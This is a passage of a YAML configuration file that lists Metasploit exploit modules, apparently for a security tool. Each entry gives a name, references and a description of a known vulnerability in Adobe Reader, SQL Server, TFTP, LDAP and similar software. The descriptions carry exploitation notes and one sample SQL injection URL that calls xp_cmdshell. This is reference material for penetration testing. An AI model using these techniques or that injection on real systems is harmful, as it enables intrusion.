\t\t\t\ta remote attacker could overflow a buffer and execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "68178"
- - URL
- http://secunia.com/advisories/41519/
- - URL
- http://www.exploit-db.com/exploits/15134
path: extensions/metasploit/
class: Msf_module
msf_adobe_u3d_meshdecl:
enable: true
msf: true
msf_key: windows/fileformat/adobe_u3d_meshdecl
name: Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an array overflow in Adobe Reader and Adobe Acrobat.\n\
\t\t\t\t\tAffected versions include < 7.1.4, < 8.2, and < 9.3. By creating a\n\
\t\t\t\t\tspecially crafted pdf that a contains malformed U3D data, an attacker may\n\
\t\t\t\t\tbe able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-3953
- - OSVDB
- "61690"
- - URL
- http://www.adobe.com/support/security/bulletins/apsb10-02.html
path: extensions/metasploit/
class: Msf_module
msf_magix_musikmaker_16_mmm:
enable: true
msf: true
msf_key: windows/fileformat/magix_musikmaker_16_mmm
name: Magix Musik Maker 16 .mmm Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Magix Musik Maker 16.\n\
\t\t\t\tWhen opening a specially crafted arrangement file (.mmm) in the application, an\n\
\t\t\t\tunsafe strcpy() will allow you to overwrite a SEH handler. This exploit\n\
\t\t\t\tbypasses DEP & ASLR, and works on XP, Vista & Windows 7. Egghunter is used, and\n\
\t\t\t\tmight require up to several seconds to receive a shell.\n\
\t\t\t"
authors:
- - OSVDB
- "72455"
- - URL
- http://www.corelan.be/advisories.php?id=CORELAN-11-002
path: extensions/metasploit/
class: Msf_module
msf_adobe_pdf_embedded_exe_nojs:
enable: true
msf: true
msf_key: windows/fileformat/adobe_pdf_embedded_exe_nojs
name: Adobe PDF Escape EXE Social Engineering (No JavaScript)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module embeds a Metasploit payload into an existing PDF file in\n\
\t\t\t\ta non-standard method. The resulting PDF can be sent to a target as\n\
\t\t\t\tpart of a social engineering attack.\n\
\t\t\t"
authors:
- - CVE
- 2010-1240
- - OSVDB
- "63667"
- - URL
- http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/
- - URL
- http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/
- - URL
- http://blog.didierstevens.com/2010/03/29/escape-from-pdf/
path: extensions/metasploit/
class: Msf_module
msf_ms_visual_basic_vbp:
enable: true
msf: true
msf_key: windows/fileformat/ms_visual_basic_vbp
name: Microsoft Visual Basic VBP Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack oveflow in Microsoft Visual\n\
\t\t\t\tBasic 6.0. When a specially crafted vbp file containing a long\n\
\t\t\t\treference line, an attacker may be able to execute arbitrary\n\
\t\t\t\tcode.\n\
\t\t\t"
authors:
- - CVE
- 2007-4776
- - OSVDB
- "36936"
- - BID
- "25629"
path: extensions/metasploit/
class: Msf_module
msf_somplplayer_m3u:
enable: true
msf: true
msf_key: windows/fileformat/somplplayer_m3u
name: S.O.M.P.L 1.0 Player Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Simple Open Music Player v1.0. When\n\
\t\t\t\tthe application is used to import a specially crafted m3u file, a buffer overflow occurs\n\
\t\t\t\tallowing arbitrary code execution.\n\
\t\t\t"
authors:
- - OSVDB
- "64368"
- - URL
- http://www.exploit-db.com/exploits/11219
path: extensions/metasploit/
class: Msf_module
msf_foxit_title_bof:
enable: true
msf: true
msf_key: windows/fileformat/foxit_title_bof
name: Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Foxit PDF Reader prior to version\n\
\t\t\t\t4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that\n\
\t\t\t\tcontains an overly long string in the Title field. This results in overwriting a\n\
\t\t\t\tstructured exception handler record.\n\n\
\t\t\t\tNOTE: This exploit does not use javascript.\n\
\t\t\t"
authors:
- - OSVDB
- "68648"
- - URL
- http://www.exploit-db.com/exploits/15532
- - URL
- http://www.corelan.be:8800/index.php/2010/11/13/offensive-security-exploit-weekend/
path: extensions/metasploit/
class: Msf_module
msf_varicad_dwb:
enable: true
msf: true
msf_key: windows/fileformat/varicad_dwb
name: VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in VariCAD 2010-2.05 EN.\n\
\t\t\t\tAn attacker must send the file to victim and the victim must open the file.\n\
\t\t\t"
authors:
- - OSVDB
- "63067"
- - BID
- "38815"
- - URL
- http://www.exploit-db.com/exploits/11789
path: extensions/metasploit/
class: Msf_module
msf_ms09_004_sp_replwritetovarbin_sqli:
enable: true
msf: true
msf_key: windows/mssql/ms09_004_sp_replwritetovarbin_sqli
name: Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection
category: Metasploit
description: "\n\
\t\t\t\t\tA heap-based buffer overflow can occur when calling the undocumented\n\
\t\t\t\t\"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n\
\t\t\t\tall versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n\
\t\t\t\tand Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n\
\t\t\t\tMicrosoft patched this vulnerability in SP3 for 2005 without any public\n\
\t\t\t\tmention.\n\n\
\t\t\t\tThis exploit smashes several pointers, as shown below.\n\n\
\t\t\t\t1. pointer to a 32-bit value that is set to 0\n\
\t\t\t\t2. pointer to a 32-bit value that is set to a length influcenced by the buffer\n\
\t\t\t\t\tlength.\n\
\t\t\t\t3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n\
\t\t\t\t\tthis value is referenced with a displacement of 0x38. For MSSQL 2005, the\n\
\t\t\t\t\tdisplacement is 0x10. The address of our buffer is conveniently stored in\n\
\t\t\t\t\tecx when this instruction is executed.\n\
\t\t\t\t4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n\
\t\t\t\t\ta displacement of 4. This pointer is not used by this exploit.\n\n\
\t\t\t\tThis particular exploit replaces the previous dual-method exploit. It uses\n\
\t\t\t\ta technique where the value contained in ecx becomes the stack. From there,\n\
\t\t\t\treturn oriented programming is used to normalize the execution state and\n\
\t\t\t\tfinally execute the payload via a \"jmp esp\". All addresses used were found\n\
\t\t\t\twithin the sqlservr.exe memory space, yielding very reliable code execution\n\
\t\t\t\tusing only a single query.\n\n\
\t\t\t\tNOTE: The MSSQL server service does not automatically restart by default. That\n\
\t\t\t\tsaid, some exceptions are caught and will not result in terminating the process.\n\
\t\t\t\tIf the exploit crashes the service prior to hijacking the stack, it won't die.\n\
\t\t\t\tOtherwise, it's a goner.\n\
\t\t\t"
authors:
- - OSVDB
- "50589"
- - CVE
- 2008-5416
- - BID
- "32710"
- - MSB
- MS09-004
- - URL
- http://www.milw0rm.com/exploits/7501
- - URL
- http://www.secforce.co.uk/blog/2011/01/exploiting-ms09-004-via-sql-injection/
path: extensions/metasploit/
class: Msf_module
msf_lyris_listmanager_weak_pass:
enable: true
msf: true
msf_key: windows/mssql/lyris_listmanager_weak_pass
name: Lyris ListManager MSDE Weak sa Password
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a weak password vulnerability in the\n\
\t\t\t\tLyris ListManager MSDE install. During installation, the 'sa'\n\
\t\t\t\taccount password is set to 'lminstall'. Once the install\n\
\t\t\t\tcompletes, it is set to 'lyris' followed by the process\n\
\t\t\t\tID of the installer. This module brute forces all possible\n\
\t\t\t\tprocess IDs that would be used by the installer.\n\
\t\t\t"
authors:
- - CVE
- 2005-4145
- - OSVDB
- "21559"
path: extensions/metasploit/
class: Msf_module
msf_ms02_056_hello:
enable: true
msf: true
msf_key: windows/mssql/ms02_056_hello
name: Microsoft SQL Server Hello Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tBy sending malformed data to TCP port 1433, an\n\
\t\t\t\tunauthenticated remote attacker could overflow a buffer and\n\
\t\t\t\tpossibly execute code on the server with SYSTEM level\n\
\t\t\t\tprivileges. This module should work against any vulnerable\n\
\t\t\t\tSQL Server 2000 or MSDE install (< SP3).\n\n\
\t\t\t"
authors:
- - CVE
- 2002-1123
- - OSVDB
- "10132"
- - BID
- "5411"
- - MSB
- MS02-056
path: extensions/metasploit/
class: Msf_module
msf_mssql_payload_sqli:
enable: true
msf: true
msf_key: windows/mssql/mssql_payload_sqli
name: Microsoft SQL Server Payload Execution via SQL injection
category: Metasploit
description: "\n\
\t\t\t\t\tThis module will execute an arbitrary payload on a Microsoft SQL\n\
\t\t\t\tServer, using a SQL injection vulnerability.\n\n\
\t\t\t\tOnce a vulnerability is identified this module\n\
\t\t\t\twill use xp_cmdshell to upload and execute Metasploit payloads.\n\
\t\t\t\tIt is necessary to specify the exact point where the SQL injection\n\
\t\t\t\tvulnerability happens. For example, given the following injection:\n\n\
\t\t\t\thttp://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical\n\n\
\t\t\t\tyou would need to set the following path:\n\
\t\t\t\tset GET_PATH /showproduct.asp?id=1;[SQLi];--&cat=foobar\n\n\
\t\t\t\tIn regard to the payload, unless there is a closed port in the web server,\n\
\t\t\t\tyou dont want to use any \"bind\" payload, specially on port 80, as you will\n\
\t\t\t\tstop reaching the vulnerable web server host. You want a \"reverse\" payload, probably to\n\
\t\t\t\tyour port 80 or to any other outbound port allowed on the firewall.\n\
\t\t\t\tFor privileged ports execute Metasploit msfconsole as root.\n\n\
\t\t\t\tCurrently, three delivery methods are supported.\n\n\
\t\t\t\tFirst, the original method uses Windows 'debug.com'. File size restrictions are\n\
\t\t\t\tavoidied by incorporating the debug bypass method presented by SecureStat at\n\
\t\t\t\tDefcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems.\n\n\
\t\t\t\tA second method takes advantage of the Command Stager subsystem. This allows using\n\
\t\t\t\tvarious techniques, such as using a TFTP server, to send the executable. By default\n\
\t\t\t\tthe Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n\
\t\t\t\tFinally, ReL1K's latest method utilizes PowerShell to transmit and recreate the\n\
\t\t\t\tpayload on the target.\n\n\
\t\t\t\tNOTE: This module will leave a payload executable on the target system when the\n\
\t\t\t\tattack is finished.\n\n\
\t\t\t"
authors:
- - CVE
- 2000-0402
- - OSVDB
- "557"
- - BID
- "1281"
- - CVE
- 2000-1209
- - OSVDB
- "15757"
- - BID
- "4797"
- - URL
- http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/
path: extensions/metasploit/
class: Msf_module
msf_mssql_payload:
enable: true
msf: true
msf_key: windows/mssql/mssql_payload
name: Microsoft SQL Server Payload Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module executes an arbitrary payload on a Microsoft SQL Server by using\n\
\t\t\t\tthe \"xp_cmdshell\" stored procedure. Currently, three delivery methods are supported.\n\n\
\t\t\t\tFirst, the original method uses Windows 'debug.com'. File size restrictions are\n\
\t\t\t\tavoidied by incorporating the debug bypass method presented by SecureStat at\n\
\t\t\t\tDefcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems.\n\n\
\t\t\t\tA second method takes advantage of the Command Stager subsystem. This allows using\n\
\t\t\t\tvarious techniques, such as using a TFTP server, to send the executable. By default\n\
\t\t\t\tthe Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n\
\t\t\t\tFinally, ReL1K's latest method utilizes PowerShell to transmit and recreate the\n\
\t\t\t\tpayload on the target.\n\n\
\t\t\t\tNOTE: This module will leave a payload executable on the target system when the\n\
\t\t\t\tattack is finished.\n\
\t\t\t"
authors:
- - CVE
- 2000-0402
- - OSVDB
- "557"
- - BID
- "1281"
- - CVE
- 2000-1209
- - OSVDB
- "15757"
- - BID
- "4797"
path: extensions/metasploit/
class: Msf_module
msf_ms02_039_slammer:
enable: true
msf: true
msf_key: windows/mssql/ms02_039_slammer
name: Microsoft SQL Server Resolution Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for the SQL Server 2000 resolution\n\
\t\t\t\tservice buffer overflow. This overflow is triggered by\n\
\t\t\t\tsending a udp packet to port 1434 which starts with 0x04 and\n\
\t\t\t\tis followed by long string terminating with a colon and a\n\
\t\t\t\tnumber. This module should work against any vulnerable SQL\n\
\t\t\t\tServer 2000 or MSDE install (pre-SP3).\n\n\
\t\t\t"
authors:
- - CVE
- 2002-0649
- - OSVDB
- "4578"
- - BID
- "5310"
- - MSB
- MS02-039
path: extensions/metasploit/
class: Msf_module
msf_ms09_004_sp_replwritetovarbin:
enable: true
msf: true
msf_key: windows/mssql/ms09_004_sp_replwritetovarbin
name: Microsoft SQL Server sp_replwritetovarbin Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tA heap-based buffer overflow can occur when calling the undocumented\n\
\t\t\t\t\"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n\
\t\t\t\tall versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n\
\t\t\t\tand Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n\
\t\t\t\tMicrosoft patched this vulnerability in SP3 for 2005 without any public\n\
\t\t\t\tmention.\n\n\
\t\t\t\tAn authenticated database session is required to access the vulnerable code.\n\
\t\t\t\tThat said, it is possible to access the vulnerable code via an SQL injection\n\
\t\t\t\tvulnerability.\n\n\
\t\t\t\tThis exploit smashes several pointers, as shown below.\n\n\
\t\t\t\t1. pointer to a 32-bit value that is set to 0\n\
\t\t\t\t2. pointer to a 32-bit value that is set to a length influcenced by the buffer\n\
\t\t\t\t\tlength.\n\
\t\t\t\t3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n\
\t\t\t\t\tthis value is referenced with a displacement of 0x38. For MSSQL 2005, the\n\
\t\t\t\t\tdisplacement is 0x10. The address of our buffer is conveniently stored in\n\
\t\t\t\t\tecx when this instruction is executed.\n\
\t\t\t\t4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n\
\t\t\t\t\ta displacement of 4. This pointer is not used by this exploit.\n\n\
\t\t\t\tThis particular exploit replaces the previous dual-method exploit. It uses\n\
\t\t\t\ta technique where the value contained in ecx becomes the stack. From there,\n\
\t\t\t\treturn oriented programming is used to normalize the execution state and\n\
\t\t\t\tfinally execute the payload via a \"jmp esp\". All addresses used were found\n\
\t\t\t\twithin the sqlservr.exe memory space, yielding very reliable code execution\n\
\t\t\t\tusing only a single query.\n\n\
\t\t\t\tNOTE: The MSSQL server service does not automatically restart by default. That\n\
\t\t\t\tsaid, some exceptions are caught and will not result in terminating the process.\n\
\t\t\t\tIf the exploit crashes the service prior to hijacking the stack, it won't die.\n\
\t\t\t\tOtherwise, it's a goner.\n\
\t\t\t"
authors:
- - OSVDB
- "50589"
- - CVE
- 2008-5416
- - BID
- "32710"
- - MSB
- MS09-004
- - URL
- http://www.milw0rm.com/exploits/7501
path: extensions/metasploit/
class: Msf_module
msf_ms04_011_pct:
enable: true
msf: true
msf_key: windows/ssl/ms04_011_pct
name: Microsoft Private Communications Transport Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the Microsoft\n\
\t\t\t\tWindows SSL PCT protocol stack. This code is based on Johnny\n\
\t\t\t\tCyberpunk's THC release and has been tested against Windows\n\
\t\t\t\t2000 and Windows XP. To use this module, specify the remote\n\
\t\t\t\tport of any SSL service, or the port and protocol of an\n\
\t\t\t\tapplication that uses SSL. The only application protocol\n\
\t\t\t\tsupported at this time is SMTP. You only have one chance to\n\
\t\t\t\tselect the correct target, if you are attacking IIS, you may\n\
\t\t\t\twant to try one of the other exploits first (WebDAV). If\n\
\t\t\t\tWebDAV does not work, this more than likely means that this\n\
\t\t\t\tis either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS\n\
\t\t\t\t5.1). Using the wrong target may not result in an immediate\n\
\t\t\t\tcrash of the remote system.\n\
\t\t\t"
authors:
- - CVE
- 2003-0719
- - OSVDB
- "5250"
- - BID
- "10116"
- - MSB
- MS04-011
path: extensions/metasploit/
class: Msf_module
msf_domino_http_accept_language:
enable: true
msf: true
msf_key: windows/lotus/domino_http_accept_language
name: IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in IBM Lotus Domino Web Server\n\
\t\t\t\tprior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP\n\
\t\t\t\trequest with an Accept-Language header greater than 114 bytes.\n\
\t\t\t"
authors:
- - CVE
- 2008-2240
- - OSVDB
- "45415"
- - BID
- "29310"
- - URL
- http://www-01.ibm.com/support/docview.wss?uid=swg21303057
path: extensions/metasploit/
class: Msf_module
msf_domino_sametime_stmux:
enable: true
msf: true
msf_key: windows/lotus/domino_sametime_stmux
name: IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Lotus Domino\\'s Sametime\n\
\t\t\t\tServer. By sending an overly long POST request to the Multiplexer\n\
\t\t\t\tSTMux.exe service we are able to overwrite SEH. Based on the exploit\n\
\t\t\t\tby Manuel Santamarina Suarez.\n\
\t\t\t"
authors:
- - CVE
- 2008-2499
- - OSVDB
- "45610"
- - BID
- "29328"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-08-028/
path: extensions/metasploit/
class: Msf_module
msf_domino_icalendar_organizer:
enable: true
msf: true
msf_key: windows/lotus/domino_icalendar_organizer
name: IBM Lotus Domino iCalendar MAILTO Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability found in IBM Lotus Domino iCalendar. By\n\
\t\t\t\tsending a long string of data as the \"ORGANIZER;mailto\" header, process \"nRouter.exe\"\n\
\t\t\t\tcrashes due to a Cstrcpy() routine in nnotes.dll, which allows remote attackers to\n\
\t\t\t\tgain arbitrary code execution.\n\n\
\t\t\t\tNote: In order to trigger the vulnerable code path, a valid Domino mailbox account\n\
\t\t\t\tis needed.\n\
\t\t\t"
authors:
- - CVE
- 2010-3407
- - OSVDB
- "68040"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-177/
- - URL
- http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/
- - URL
- http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515
path: extensions/metasploit/
class: Msf_module
msf_sipxezphone_cseq:
enable: true
msf: true
msf_key: windows/sip/sipxezphone_cseq
name: SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in SIPfoundry's\n\
\t\t\t\tsipXezPhone version 0.35a. By sending an long CSeq header,\n\
\t\t\t\ta remote attacker could overflow a buffer and execute\n\
\t\t\t\tarbitrary code on the system with the privileges of\n\
\t\t\t\tthe affected application.\n\
\t\t\t"
authors:
- - CVE
- 2006-3524
- - OSVDB
- "27122"
- - BID
- "18906"
path: extensions/metasploit/
class: Msf_module
msf_aim_triton_cseq:
enable: true
msf: true
msf_key: windows/sip/aim_triton_cseq
name: AIM Triton 1.0.4 CSeq Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in AOL\\'s AIM\n\
\t\t\t\tTriton 1.0.4. By sending an overly long CSeq value,\n\
\t\t\t\ta remote attacker could overflow a buffer and execute\n\
\t\t\t\tarbitrary code on the system with the privileges of\n\
\t\t\t\tthe affected application.\n\
\t\t\t"
authors:
- - CVE
- 2006-3524
- - OSVDB
- "27122"
- - BID
- "18906"
path: extensions/metasploit/
class: Msf_module
msf_sipxphone_cseq:
enable: true
msf: true
msf_key: windows/sip/sipxphone_cseq
name: SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in SIPfoundry's\n\
\t\t\t\tsipXphone 2.6.0.27. By sending an overly long CSeq value,\n\
\t\t\t\ta remote attacker could overflow a buffer and execute\n\
\t\t\t\tarbitrary code on the system with the privileges of\n\
\t\t\t\tthe affected application.\n\
\t\t\t"
authors:
- - CVE
- 2006-3524
- - OSVDB
- "27122"
- - BID
- "18906"
path: extensions/metasploit/
class: Msf_module
msf_ms10_025_wmss_connect_funnel:
enable: true
msf: true
msf_key: windows/mmsp/ms10_025_wmss_connect_funnel
name: Windows Media Services ConnectFunnel Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Windows Media\n\
\t\t\t\tUnicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially\n\
\t\t\t\tcrafted FunnelConnect request, an attacker can execute arbitrary code\n\
\t\t\t\tunder the \"NetShowServices\" user account. Windows Media Services 4.1 ships\n\
\t\t\t\twith Windows 2000 Server, but is not installed by default.\n\n\
\t\t\t\tNOTE: This service does NOT restart automatically. Successful, as well as\n\
\t\t\t\tunsuccessful exploitation attempts will kill the service which prevents\n\
\t\t\t\tadditional attempts.\n\
\t\t\t"
authors:
- - CVE
- 2010-0478
- - OSVDB
- "63726"
- - MSB
- MS10-025
- - URL
- https://www.lexsi.com/abonnes/labs/adviso-cve-2010-0478.txt
path: extensions/metasploit/
class: Msf_module
msf_attftp_long_filename:
enable: true
msf: true
msf_key: windows/tftp/attftp_long_filename
name: Allied Telesyn TFTP Server 1.9 Long Filename Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a\n\
\t\t\t\trequest (get/write) for an overly long file name.\n\
\t\t\t"
authors:
- - CVE
- 2006-6184
- - OSVDB
- "11350"
- - BID
- "21320"
- - URL
- http://milw0rm.com/exploits/2887
- - URL
- ftp://guest:guest@ftp.alliedtelesyn.co.uk/pub/utilities/at-tftpd19.zip
path: extensions/metasploit/
class: Msf_module
msf_quick_tftp_pro_mode:
enable: true
msf: true
msf_key: windows/tftp/quick_tftp_pro_mode
name: Quick FTP Pro 2.1 Transfer-Mode Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Quick TFTP Pro server\n\
\t\t\t\tproduct. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting\n\
\t\t\t\tin a DoS. This is a port of a sploit by Mati \"muts\" Aharoni.\n\
\t\t\t"
authors:
- - CVE
- 2008-1610
- - OSVDB
- "43784"
- - BID
- "28459"
- - URL
- http://secunia.com/advisories/29494
path: extensions/metasploit/
class: Msf_module
msf_threectftpsvc_long_mode:
enable: true
msf: true
msf_key: windows/tftp/threectftpsvc_long_mode
name: 3CTftpSvc TFTP Long Mode Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in 3CTftpSvc 2.0.1. By\n\
\t\t\t\tsending a specially crafted packet with an overly long mode\n\
\t\t\t\tfield, a remote attacker could overflow a buffer and execute\n\
\t\t\t\tarbitrary code on the system.\n\
\t\t\t"
authors:
- - CVE
- 2006-6183
- - OSVDB
- "30758"
- - BID
- "21301"
- - URL
- http://secunia.com/advisories/23113/
path: extensions/metasploit/
class: Msf_module
msf_dlink_long_filename:
enable: true
msf: true
msf_key: windows/tftp/dlink_long_filename
name: D-Link TFTP 1.0 Long Filename Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in D-Link TFTP 1.0.\n\
\t\t\t\tBy sending a request for an overly long file name, an attacker\n\
\t\t\t\tcould overflow a buffer and execute arbitrary code. For best results,\n\
\t\t\t\tuse bind payloads with nonx (No NX).\n\
\t\t\t"
authors:
- - CVE
- 2007-1435
- - OSVDB
- "33977"
- - BID
- "22923"
path: extensions/metasploit/
class: Msf_module
msf_tftpdwin_long_filename:
enable: true
msf: true
msf_key: windows/tftp/tftpdwin_long_filename
name: TFTPDWIN v0.4.2 Long Filename Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending\n\
\t\t\t\tan overly long file name to the tftpd.exe server, the stack can be overwritten.\n\
\t\t\t"
authors:
- - CVE
- 2006-4948
- - OSVDB
- "29032"
- - BID
- "20131"
- - URL
- http://www.milw0rm.com/exploits/3132
path: extensions/metasploit/
class: Msf_module
msf_futuresoft_transfermode:
enable: true
msf: true
msf_key: windows/tftp/futuresoft_transfermode
name: FutureSoft TFTP Server 2000 Transfer-Mode Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the FutureSoft TFTP Server\n\
\t\t\t\t2000 product. By sending an overly long transfer-mode string, we were able\n\
\t\t\t\tto overwrite both the SEH and the saved EIP. A subsequent write-exception\n\
\t\t\t\tthat will occur allows the transferring of execution to our shellcode\n\
\t\t\t\tvia the overwritten SEH. This module has been tested against Windows\n\
\t\t\t\t2000 Professional and for some reason does not seem to work against\n\
\t\t\t\tWindows 2000 Server (could not trigger the overflow at all).\n\
\t\t\t"
authors:
- - CVE
- 2005-1812
- - OSVDB
- "16954"
- - BID
- "13821"
- - URL
- http://www.security.org.sg/vuln/tftp2000-1001.html
path: extensions/metasploit/
class: Msf_module
msf_tftpd32_long_filename:
enable: true
msf: true
msf_key: windows/tftp/tftpd32_long_filename
name: TFTPD32 <= 2.21 Long Filename Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in TFTPD32 version 2.21\n\
\t\t\t\tand prior. By sending a request for an overly long file name\n\
\t\t\t\tto the tftpd32 server, a remote attacker could overflow a buffer and\n\
\t\t\t\texecute arbitrary code on the system.\n\
\t\t\t"
authors:
- - CVE
- 2002-2226
- - OSVDB
- "45903"
- - BID
- "6199"
path: extensions/metasploit/
class: Msf_module
msf_imail_thc:
enable: true
msf: true
msf_key: windows/ldap/imail_thc
name: IMail LDAP Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a buffer overflow in the LDAP service that is\n\
\t\t\t\tpart of the IMail product. This module was tested against\n\
\t\t\t\tversion 7.10 and 8.5, both running on Windows 2000.\n\
\t\t\t"
authors:
- - CVE
- 2004-0297
- - OSVDB
- "3984"
- - BID
- "9682"
- - URL
- http://secunia.com/advisories/10880/
path: extensions/metasploit/
class: Msf_module
msf_pgp_keyserver7:
enable: true
msf: true
msf_key: windows/ldap/pgp_keyserver7
name: Network Associates PGP KeyServer 7 LDAP Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the LDAP service that is\n\
\t\t\t\t\tpart of the NAI PGP Enterprise product suite. This module was tested\n\
\t\t\t\t\tagainst PGP KeyServer v7.0. Due to space restrictions, egghunter is\n\
\t\t\t\t\tused to find our payload - therefore you may wish to adjust WfsDelay.\n\
\t\t\t"
authors:
- - CVE
- 2001-1320
- - OSVDB
- "4742"
- - BID
- "3046"
- - URL
- http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/
path: extensions/metasploit/
class: Msf_module
msf_hummingbird_exceed:
enable: true
msf: true
msf_key: windows/lpd/hummingbird_exceed
name: Hummingbird Connectivity 10 SP5 LPD Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Hummingbird Connectivity\n\
\t\t\t\t10 LPD Daemon. This module has only been tested against Hummingbird\n\
\t\t\t\tExceed v10 with SP5.\n\
\t\t\t"
authors:
- - CVE
- 2005-1815
- - OSVDB
- "16957"
- - BID
- "13788"
path: extensions/metasploit/
class: Msf_module
msf_saplpd:
enable: true
msf: true
msf_key: windows/lpd/saplpd
name: SAP SAPLPD 6.28 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in SAPlpd 6.28 (SAP Release 6.40) .\n\
\t\t\t\tBy sending an overly long argument, an attacker may be able to execute arbitrary\n\
\t\t\t\tcode.\n\
\t\t\t"
authors:
- - CVE
- 2008-0621
- - OSVDB
- "41127"
- - BID
- "27613"
path: extensions/metasploit/
class: Msf_module
msf_wincomlpd_admin:
enable: true
msf: true
msf_key: windows/lpd/wincomlpd_admin
name: WinComLPD <= 3.0.2 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in WinComLPD <= 3.0.2.\n\
\t\t\t\tBy sending an overly long authentication packet to the remote\n\
\t\t\t\tadminstration service, an attacker may be able to execute arbitrary\n\
\t\t\t\tcode.\n\
\t\t\t"
authors:
- - CVE
- 2008-5159
- - OSVDB
- "42861"
- - BID
- "27614"
path: extensions/metasploit/
class: Msf_module
msf_niprint:
enable: true
msf: true
msf_key: windows/lpd/niprint
name: NIPrint LPD Request Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the\n\
\t\t\t\tNetwork Instrument NIPrint LPD service. Inspired by\n\
\t\t\t\tImmunity's VisualSploit :-)\n\
\t\t\t"
authors:
- - CVE
- 2003-1141
- - OSVDB
- "2774"
- - BID
- "8968"
- - URL
- http://www.immunitysec.com/documentation/vs_niprint.html
path: extensions/metasploit/
class: Msf_module
msf_trendmicro_serverprotect:
enable: true
msf: true
msf_key: windows/antivirus/trendmicro_serverprotect
name: Trend Micro ServerProtect 5.58 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.\n\
\t\t\t\tBy sending a specially crafted RPC request, an attacker could overflow the\n\
\t\t\t\tbuffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-1070
- - OSVDB
- "33042"
- - BID
